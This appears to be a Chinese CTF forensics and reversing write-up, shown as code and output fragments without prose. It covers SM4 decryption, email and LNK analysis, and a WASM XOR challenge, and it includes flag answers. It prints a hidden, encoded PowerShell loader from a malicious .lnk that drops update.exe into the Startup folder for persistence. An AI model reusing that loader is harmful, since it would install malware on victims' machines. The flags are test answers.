0x3D, 0x2D, 0x0A, 0xFD, 0xE4, 0xB7, 0x37, 0x63, 0x28, 0xDD,28        0x7C, 0xEA, 0x97, 0x8C, 0x6D, 0xC7, 0xF2, 0x3E, 0x1A, 0x71, 0x1D, 0x29, 0xC5, 0x89, 0x6F, 0xB7,29        0x62, 0x0E, 0xAA, 0x18, 0xBE, 0x1B, 0xFC, 0x56, 0x36, 0x24, 0x07, 0x82, 0xFA, 0x54, 0x5B, 0x40,30        0x8F, 0xED, 0x1F, 0xDA, 0x93, 0x80, 0xF9, 0x61, 0x1C, 0x70, 0xC3, 0x85, 0x95, 0xA9, 0x79, 0x08,31        0x46, 0x29, 0x02, 0x3B, 0x4D, 0x83, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x1A, 0x47, 0x5C, 0x0D, 0xEA,32        0x9E, 0xCB, 0x55, 0x20, 0x15, 0x8A, 0x9A, 0xCB, 0x43, 0x0C, 0xF0, 0x0B, 0x40, 0x58, 0x00, 0x8F,33        0xEB, 0xBE, 0x3D, 0xC2, 0x9F, 0x51, 0xFA, 0x13, 0x3B, 0x0D, 0x90, 0x5B, 0x6E, 0x45, 0x59, 0x3334    ]35 36    def __init__(self, key: bytes):37        self.sk = [0] * 3238        self.set_key(key)39 40    def _rotl(self, x, n):41        return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF42 43    def _S(self, x):44        result = 045        for i in range(4):46            byte = (x >> (24 - i * 8)) & 0xFF47            result |= self.SboxTable[byte] << (24 - i * 8)48        return result49 50    def _L(self, x):51        return (x ^ self._rotl(x, 2) ^ self._rotl(x, 10) ^ self._rotl(x, 18) ^ self._rotl(x, 24)) & 0xFFFFFFFF52 53    def _T(self, x):54        return self._L(self._S(x))55    56    # 修正后的密钥扩展函数57    def _CKF(self, a, b, c, ck):58        val = (b ^ c ^ ck) & 0xFFFFFFFF59        t_val = self._T(val)60        return (a ^ t_val) & 0xFFFFFFFF61 62    # 修正后的加密/解密轮函数63    def _F(self, x1, x2, x3, rk):64        return self._T((x1 ^ x2 ^ x3 ^ rk) & 0xFFFFFFFF)65 66    def set_key(self, key: bytes):67        if len(key) != 16:68            raise ValueError("SM4 key must be 16 bytes long")69        70        key_ints = list(struct.unpack('>IIII', key))71        k = [0] * 3672        for i in range(4):73            k[i] = key_ints[i] ^ self.FK[i]74        75        for i in range(32):76            # 使用修正后的密钥扩展逻辑77            # PHP: $k[$i] ^ $this->CKF($k[$i + 1], $k[$i + 2], $k[$i + 3], self::$CK[$i])78            # $this->CKF(...) is $k[i+1] ^ $this->T(...)79            # So, it's: k[i] ^ k[i+1] ^ T(k[i+2] ^ k[i+3] ^ CK[i])80            inner_xor = (k[i + 2] ^ k[i + 3] ^ self.CK[i]) & 0xFFFFFFFF81            t_val = self._T(inner_xor)82            k[i + 4] = (k[i] ^ k[i + 1] ^ t_val) & 0xFFFFFFFF83            self.sk[i] = k[i + 4]84            85    def _crypt_block(self, block: bytes, is_decrypt: bool):86        x = list(struct.unpack('>IIII', block))87        88        round_keys = self.sk[::-1] if is_decrypt else self.sk89        90        for i in range(32):91            round_key = round_keys[i]92            # 修正后的轮函数应用逻辑93            # new_x3 = old_x0 ^ F(old_x1, old_x2, old_x3, rk)94            f_result = self._F(x[1], x[2], x[3], round_key)95            new_val = (x[0] ^ f_result) & 0xFFFFFFFF96            x = [x[1], x[2], x[3], new_val]97            98        x.reverse()99        return struct.pack('>IIII', *x)100 101    def decrypt_ecb(self, ciphertext: bytes):102        decrypted_padded = b''103        for i in range(0, len(ciphertext), 16):104            block = ciphertext[i:i+16]105            decrypted_padded += self._crypt_block(block, is_decrypt=True)106        107        return self._unpad(decrypted_padded)108 109    def _unpad(self, data: bytes):110        padding_len = data[-1]111        if padding_len > 16 or padding_len == 0:112            return data113        114        padding = data[-padding_len:]115        if all(p == padding_len for p in padding):116            return data[:-padding_len]117        else:118            return data119 120# --- 主程序 ---121if __name__ == "__main__":122    key_str = "a8a58b78f41eeb6a"123    # 题目中的密文124    ciphertext_b64 = "VCWBIdzfjm45EmYFWcqXX0VpQeZPeI6Qqyjsv31yuPTDC80lhFlaJY2R3TintdQu"125    # 你提供的Hex解码后的密文126    # ciphertext_b64 = "VCWBIdzfjm45EmYFWcqXX0VpQeZPeI6Qqyjsv31yuP/DC80lhFlaJY2R3TintdQu" # 原始应该是这个，有个/127 128    key_bytes = key_str.encode('utf-8')129    ciphertext_bytes = base64.b64decode(ciphertext_b64)130 131    print(f"密钥 (bytes): {key_bytes}")132    print(f"待解密密文 (bytes): {ciphertext_bytes.hex()}")133    print("-" * 30)134 135    sm4_cipher = SM4(key_bytes)136 137    try:138        decrypted_bytes = sm4_cipher.decrypt_ecb(ciphertext_bytes)139        try:140            flag = decrypted_bytes.decode('utf-8')141            print("解密成功!")142            print(f"Flag: {flag}")143        except UnicodeDecodeError:144            print("解密成功! (但无法用UTF-8解码)")145            print(f"原始字节: {decrypted_bytes}")146            print(f"Hex表示: {decrypted_bytes.hex()}")147 148    except Exception as e:149        print(f"解密失败: {e}")

1密钥 (bytes): b'a8a58b78f41eeb6a'2待解密密文 (bytes): 54258121dcdf8e6e3912660559ca975f456941e64f788e90ab28ecbf7d72b8f4c30bcd2584595a258d91dd38a7b5d42e3------------------------------4解密成功!5Flag: flag{1ac380d6-5820-4e1a-b40e-ddf1789f6b0d}

1flag{1ac380d6-5820-4e1a-b40e-ddf1789f6b0d}

1驱动器: E:\Desktop\BadEmail\chall1.E012磁阵所属平台类型: Windows 软磁阵3磁阵类型: linear4磁阵驱动器数量: 25可用空间大小: 990.0 MB (1038090240 字节)6总空间大小: 1.9 GB (2076180480 字节)7起始扇区: 65664 (扇区)8循环类型: 9条带大小: 0 (扇区)10本驱动器编号: 11112驱动器: E:\Desktop\BadEmail\chall2.E0113磁阵所属平台类型: Windows 软磁阵14磁阵类型: linear15磁阵驱动器数量: 216可用空间大小: 990.0 MB (1038090240 字节)17总空间大小: 1.9 GB (2076180480 字节)18起始扇区: 65664 (扇区)19循环类型: 20条带大小: 0 (扇区)21本驱动器编号: 0

1From: =?GBK?B?wfW378P5?= <hnhuimeng_hr@163.com>2To: m00nwa1ker2025@outlook.com3Subject: =?GBK?B?uv7Ez7vmw87T0M/euavLvrncwO255raoob4yMDI10MKw5qG/?=

1flag{hnhuimeng_hr@163.com}

1import mailbox2import os3import re4from email.header import decode_header5 6MBOX_FILE = 'INBOX'7OUTPUT_DIR = 'attachments'8 9def decode_mime_header(header_string):10    """11    解码MIME编码的头部信息（如文件名），正确处理多种字符集。12    """13    if not header_string:14        return ""15    16    decoded_parts = []17    try:18        for part, charset in decode_header(header_string):19            if isinstance(part, bytes):20                if charset:21                    try:22                        decoded_parts.append(part.decode(charset, 'replace'))23                    except (UnicodeDecodeError, LookupError):24                        decoded_parts.append(part.decode('gb18030', 'ignore'))25                else:26                    try:27                        decoded_parts.append(part.decode('utf-8', 'replace'))28                    except UnicodeDecodeError:29                        decoded_parts.append(part.decode('gb18030', 'ignore'))30            else:31                decoded_parts.append(part)32    except Exception:33        return str(header_string) # Fallback to plain string if decoding fails34            35    return "".join(decoded_parts)36 37def get_email_body(message):38    """39    从 message 对象中提取 text/plain 和 text/html 正文内容。40    """41    body_plain = None42    body_html = None43    44    if message.is_multipart():45        for part in message.walk():46            content_type = part.get_content_type()47            content_disposition = str(part.get('Content-Disposition'))48 49            # 我们只想要正文部分，而不是附件50            if "attachment" not in content_disposition:51                if content_type == 'text/plain' and body_plain is None:52                    payload = part.get_payload(decode=True)53                    charset = part.get_content_charset() or 'utf-8'54                    try:55                        body_plain = payload.decode(charset, 'replace')56                    except LookupError:57                        body_plain = payload.decode('gb18030', 'replace')58                elif content_type == 'text/html' and body_html is None:59                    payload = part.get_payload(decode=True)60                    charset = part.get_content_charset() or 'utf-8'61                    try:62                        body_html = payload.decode(charset, 'replace')63                    except LookupError:64                        body_html = payload.decode('gb18030', 'replace')65    else: # 如果不是 multipart，它本身就是正文66        payload = message.get_payload(decode=True)67        charset = message.get_content_charset() or 'utf-8'68        try:69            body_plain = payload.decode(charset, 'replace')70        except LookupError:71            body_plain = payload.decode('gb18030', 'replace')72            73    return body_plain, body_html74 75 76def extract_from_mbox(mbox_file_path, output_dir):77    """78    从 mbox 格式的文件中提取邮件正文和附件。79    """80    if not os.path.exists(output_dir):81        os.makedirs(output_dir)82        print(f"创建输出文件夹: {output_dir}")83 84    try:85        mbox = mailbox.mbox(mbox_file_path)86    except FileNotFoundError:87        print(f"错误: 文件 '{mbox_file_path}' 未找到。")88        return89    except Exception as e:90        print(f"打开 mbox 文件时出错: {e}")91        return92 93    email_count = 094    attachment_count = 095 96    print(f"--- 正在以 mbox 格式解析文件: {mbox_file_path} ---")97 98    for i, message in enumerate(mbox):99        email_count += 1100        print(f"\n{'='*20} 邮件 #{i+1} {'='*20}")101        102        # --- 打印邮件头部信息 ---103        subject = decode_mime_header(message['Subject'])104        sender = decode_mime_header(message['From'])105        recipient = decode_mime_header(message['To'])106        date = decode_mime_header(message['Date'])107        108        print(f"  发件人: {sender}")109        print(f"  收件人: {recipient}")110        print(f"  日  期: {date}")111        print(f"  主  题: {subject}")112        print("-" * 50)113 114        # --- 打印邮件正文 ---115        body_plain, body_html = get_email_body(message)116        if body_plain:117            print("  [正文 - 纯文本]:")118            print(body_plain.strip())119            print("-" * 50)120        if body_html:121            print("  [正文 - HTML]:")122            print(body_html.strip())123            print("-" * 50)124        125        # --- 提取附件 ---126        print("  [附件信息]:")127        found_attachments = False128        for part in message.walk():129            if part.get_content_maintype() == 'multipart' or part.get('Content-Disposition') is None:130                continue131            132            filename = part.get_filename()133            if filename:134                found_attachments = True135                decoded_filename = decode_mime_header(filename)136                cleaned_filename = re.sub(r'[\\/*?:"<>|]', "", decoded_filename).strip()137                if not cleaned_filename:138                    continue139                140                filepath = os.path.join(output_dir, cleaned_filename)141                print(f"    [+] 发现附件: {decoded_filename}")142                143                payload = part.get_payload(decode=True)144                if payload:145                    with open(filepath, 'wb') as f_out:146                        f_out.write(payload)147                    print(f"        -> 已保存至: {filepath}")148                    attachment_count += 1149                else:150                    print(f"        -> 警告: 附件内容为空。")151        152        if not found_attachments:153            print("    (无附件)")154 155    print(f"\n{'='*20} 处理完成 {'='*20}")156    print(f"共处理 {email_count} 封邮件，提取了 {attachment_count} 个附件。")157 158 159if __name__ == '__main__':160    extract_from_mbox(MBOX_FILE, OUTPUT_DIR)

1LECmd -f 湖南绘梦有限公司管理规定.lnk --csv .

1>> Tracker database block2   Machine ID:  desktop-kdrhc2u3   MAC Address: 00:0c:29:d8:d0:694   MAC Vendor:  VMWARE5   Creation:    2025-06-15 00:36:19

1flag{00:0c:29:d8:d0:69}

1flag{y}

1C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -enc "JAB6AGQAPQAgAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuADsAJABjAGEAcABlAD0AIAAiACQAegBkAFwAVm5XU9h+pmgJZ1CWbFH4U6F7BnTEiZpbLgBsAG4AawAiADsAJABjADEAcwAyACAAPQAgAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAYwBhAHAAZQA7ACQAeABrACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAgAEAAKAAwAHgAMQAzACwAIAAwAHgARgA1ACkAOwAkAGYAYgBjAHMAZQAxACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABjAGEAcABlACkAOwAkAHMAdABzAGUAZQA9ACQAYwAxAHMAMgAuAEwAZQBuAGcAdABoAC0AMgA2ADEAOQA4ADgALQAzADUAMAAzADEAOwAkAGUAbgBjAHIAeQBwAHQAZQBkAEQAYQB0AGEAIAA9ACAAJABmAGIAYwBzAGUAMQBbACQAcwB0AHMAZQBlAC4ALgAoACQAZgBiAGMAcwBlADEALgBMAGUAbgBnAHQAaAAgAC0AMwA1ADAAMwAyACkAXQA7ACQAZAAwAHMAeABkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABiAHkAdABlAFsAXQAgACgAJABlAG4AYwByAHkAcAB0AGUAZABEAGEAdABhAC4ATABlAG4AZwB0AGgAKQA7AGYAbwByACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwByAHkAcAB0AGUAZABEAGEAdABhAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkADAAcwB4AGQAWwAkAGkAXQAgAD0AIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEQAYQB0AGEAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAeABrAFsAJABpACAAJQAgACQAeABrAC4ATABlAG4AZwB0AGgAXQB9ADsAJABvAG8AcAAgAD0AIABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAegBkACAAIAAtAEMAaABpAGwAZABQAGEAdABoACAAIgBWbldT2H6maAlnUJZsUfhToXsGdMSJmlsuAHAAZABmACIAOwBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAJABvAG8AcAAsACAAJABkADAAcwB4AGQAKQA7AFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAYwBhAHAAZQAgAC0ARgBvAHIAYwBlADsAaQBpACAAIgBWbldT2H6maAlnUJZsUfhToXsGdMSJmlsuAHAAZABmACIAOwAgACQAcABvADIAcwBkAHcAMQAgAD0AIAAkAGYAYgBjAHMAZQAxAFsAKAAkAGYAYgBjAHMAZQAxAC4ATABlAG4AZwB0AGgAIAAtACAAMwA1ADAAMwAxACkALgAuACgAJABmAGIAYwBzAGUAMQAuAEwAZQBuAGcAdABoACAALQAgADEAKQBdADsAIAAkAGMANAAwADUAdgBkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALAAkAHAAbwAyAHMAZAB3ADEAKQA7ACQAZABzADIAdwBkACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnADYAUwBzAGEAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwBaAGkAcABTAHQAcgBlAGEAbQAoACQAYwA0ADAANQB2AGQALAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAOwAkAGcANgBTAHMAYQAuAEMAbwBwAHkAVABvACgAJABkAHMAMgB3AGQAKQA7ACQAZABmADIAMwBkACAAPQAgACQAZABzADIAdwBkAC4AVABvAEEAcgByAGEAeQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBXAHIAaQB0AGUAQQBsAGwAQgB5AHQAZQBzACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAFMAdABhAHIAdAAgAE0AZQBuAHUAXABQAHIAbwBnAHIAYQBtAHMAXABTAHQAYQByAHQAdQBwAFwAdQBwAGQAYQB0AGUALgBlAHgAZQAiACwAIAAkAGQAZgAyADMAZAApAA=="

1[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("...")

1$zd= Get-Location;$cape= "$zd\湖南绘梦有限公司管理规定.lnk";$c1s2 = Get-Item -Path $cape;$xk = [byte[]] @(0x13, 0xF5);$fbcse1 = [System.IO.File]::ReadAllBytes($cape);$stsee=$c1s2.Length-261988-35031;$encryptedData = $fbcse1[$stsee..($fbcse1.Length -35032)];$d0sxd = New-Object byte[] ($encryptedData.Length);for($i = 0; $i -lt $encryptedData.Length; $i++) {$d0sxd[$i] = $encryptedData[$i] -bxor $xk[$i % $xk.Length]};$oop = Join-Path -Path $zd  -ChildPath "湖南绘梦有限公司管理规 定.pdf";[System.IO.File]::WriteAllBytes($oop, $d0sxd);Remove-Item -Path $cape -Force;ii "湖南绘梦有限公司管理规定.pdf"; $po2sdw1 = $fbcse1[($fbcse1.Length - 35031)..($fbcse1.Length - 1)]; $c405vd = New-Object System.IO.MemoryStream(,$po2sdw1);$ds2wd = New-Object System.IO.MemoryStream;$g6Ssa = New-Object System.IO.Compression.GZipStream($c405vd, [System.IO.Compression.CompressionMode]::Decompress);$g6Ssa.CopyTo($ds2wd);$df23d = $ds2wd.ToArray();[System.IO.File]::WriteAllBytes("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.exe", $df23d)

1[System.IO.File]::WriteAllBytes("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\update.exe",  $df23d)

1flag{T1547.001}

1import gzip2import os3 4# --- 配置 ---5LNK_FILE = "湖南绘梦有限公司管理规定.lnk" 6 7# 输出文件名8DECRYPTED_PDF_FILE = "湖南绘梦有限公司管理规定.pdf"9DECRYPTED_EXE_FILE = "update.exe"10 11# 从 PowerShell 脚本中获取的常量12# PDF 相关的偏移量13PDF_OFFSET_START_FROM_END = 261988 + 3503114PDF_OFFSET_END_FROM_END = 3503215PDF_XOR_KEY = bytes([0x13, 0xF5])16 17# EXE 相关的偏移量18EXE_OFFSET_START_FROM_END = 3503119# --- 结束配置 ---20 21def extract_and_decrypt():22    """23    从 .lnk 文件中提取并解密 PDF 和 EXE 文件。24    """25    try:26        print(f"[*] 正在读取文件: {LNK_FILE}")27        with open(LNK_FILE, 'rb') as f:28            lnk_data = f.read()29        file_length = len(lnk_data)30        print(f"[+] 文件读取成功，总大小: {file_length} 字节。")31    except FileNotFoundError:32        print(f"[!] 错误: 文件 '{LNK_FILE}' 未找到。请检查文件名和路径。")33        return34    35    # --- 1. 处理 PDF 文件 ---36    print("\n--- 正在提取和解密 PDF 文件 ---")37    try:38        # 根据 PowerShell 逻辑计算切片索引39        # $stsee=$c1s2.Length-261988-35031;40        # $encryptedData = $fbcse1[$stsee..($fbcse1.Length -35032)];41        pdf_start_index = file_length - PDF_OFFSET_START_FROM_END42        pdf_end_index = file_length - PDF_OFFSET_END_FROM_END43        44        if pdf_start_index < 0 or pdf_end_index <= pdf_start_index:45            raise ValueError("计算出的 PDF 偏移量无效。")46 47        encrypted_pdf_data = lnk_data[pdf_start_index:pdf_end_index]48        print(f"[+] 定位到加密的 PDF 数据 (大小: {len(encrypted_pdf_data)} 字节)")49 50        # 执行 XOR 解密51        decrypted_pdf_data = bytearray()52        for i in range(len(encrypted_pdf_data)):53            decrypted_byte = encrypted_pdf_data[i] ^ PDF_XOR_KEY[i % len(PDF_XOR_KEY)]54            decrypted_pdf_data.append(decrypted_byte)55        56        # 保存解密后的 PDF57        with open(DECRYPTED_PDF_FILE, 'wb') as f:58            f.write(decrypted_pdf_data)59        print(f"[+] PDF 解密成功！已保存为: {DECRYPTED_PDF_FILE}")60 61    except Exception as e:62        print(f"[!] 提取 PDF 文件时发生错误: {e}")63 64    # --- 2. 处理 EXE 文件 ---65    print("\n--- 正在提取和解压 EXE 文件 ---")66    try:67        # 根据 PowerShell 逻辑计算切片索引68        # $po2sdw1 = $fbcse1[($fbcse1.Length - 35031)..($fbcse1.Length - 1)];69        exe_start_index = file_length - EXE_OFFSET_START_FROM_END70        71        if exe_start_index < 0:72             raise ValueError("计算出的 EXE 偏移量无效。")73             74        compressed_exe_data = lnk_data[exe_start_index:]75        print(f"[+] 定位到压缩的 EXE 数据 (大小: {len(compressed_exe_data)} 字节)")76        77        # 执行 GZip 解压缩78        decrypted_exe_data = gzip.decompress(compressed_exe_data)79        80        # 保存解压后的 EXE81        with open(DECRYPTED_EXE_FILE, 'wb') as f:82            f.write(decrypted_exe_data)83        print(f"[+] EXE 解压成功！已保存为: {DECRYPTED_EXE_FILE}")84 85    except Exception as e:86        print(f"[!] 提取 EXE 文件时发生错误: {e}")87 88if __name__ == '__main__':89    extract_and_decrypt()

1exiftool 湖南绘梦有限公司管理规定.pdf

1Create Date                     : 2025:08:15 01:37:26+08:002Creator                         : Chromium3Modify Date                     : 2025:08:15 01:37:26+08:00

1flag{2025-08-15_01:37:26}

1code:00B6 L1:                                     ; CODE XREF: c+18↑j2code:00B6                 i32.const 0x263code:00B8                 i32.ne4code:00B9                 if                      ; L75code:00BB                  i32.const 06code:00BD                  return7code:00BE                 end                     ; L7

1data:00FF data_0:         db 0xFF, 0xF5, 0xF8, 0xFE, 0xE2, 0xFF, 0xF8, 0xFC, 0xA92data:0108                 db 0xFB, 0xAB, 0xAE, 0xFA, 0xAD, 0xAC, 0xA8, 0xFA, 0xAE3data:0111                 db 0xAB, 2 dup(0xA1), 0xAF, 0xAE, 0xF8, 0xAC, 0xAF, 0xAE4data:011A                 db 0xFC, 0xA1, 0xFA, 0xA8, 2 dup(0xFB), 0xAD, 0xFC, 0xAC5data:0123                 db 0xAA, 0xE46data:0123 ; end of 'data'

1code:00C1 L8:                                     ; CODE XREF: c+B3↓j2code:00C1                  block                  ; L93code:00C3                   i32.load8_u [$local1+0x400]4code:00C9                   i32.add $local1, $local25code:00CE                   i32.load8_s6code:00D1                   i32.xor7code:00D2                   local.tee $param08code:00D4                   i32.const 0x999code:00D7                   i32.eq10code:00D8                   local.set $local011code:00DA                   i32.ne  $param0, 0x9912code:00E0                   br_if   0 L913code:00E2                   i32.add $local1, 114code:00E7                   local.tee $local115code:00E9                   i32.const 0x2616code:00EB                   i32.ne17code:00EC                   br_if   1 L818code:00EE                  end                    ; L9

1input[i] = data[i] ^ 0x99

1data = [2    0xFF, 0xF5, 0xF8, 0xFE, 0xE2, 0xFF, 0xF8, 0xFC, 0xA9, 0xFB, 0xAB, 0xAE, 0xFA, 0xAD,3    0xAC, 0xA8, 0xFA, 0xAE, 0xAB, 0xA1, 0xA1, 0xAF, 0xAE, 0xF8, 0xAC, 0xAF, 0xAE, 0xFC,4    0xA1, 0xFA, 0xA8, 0xFB, 0xFB, 0xAD, 0xFC, 0xAC, 0xAA, 0xE45]6 7key = 0x998flag = ""9 10for byte in data:11    flag += chr(byte ^ key)12 13print(flag)

1flag{fae0b27c451c728867a567e8c1bb4e53}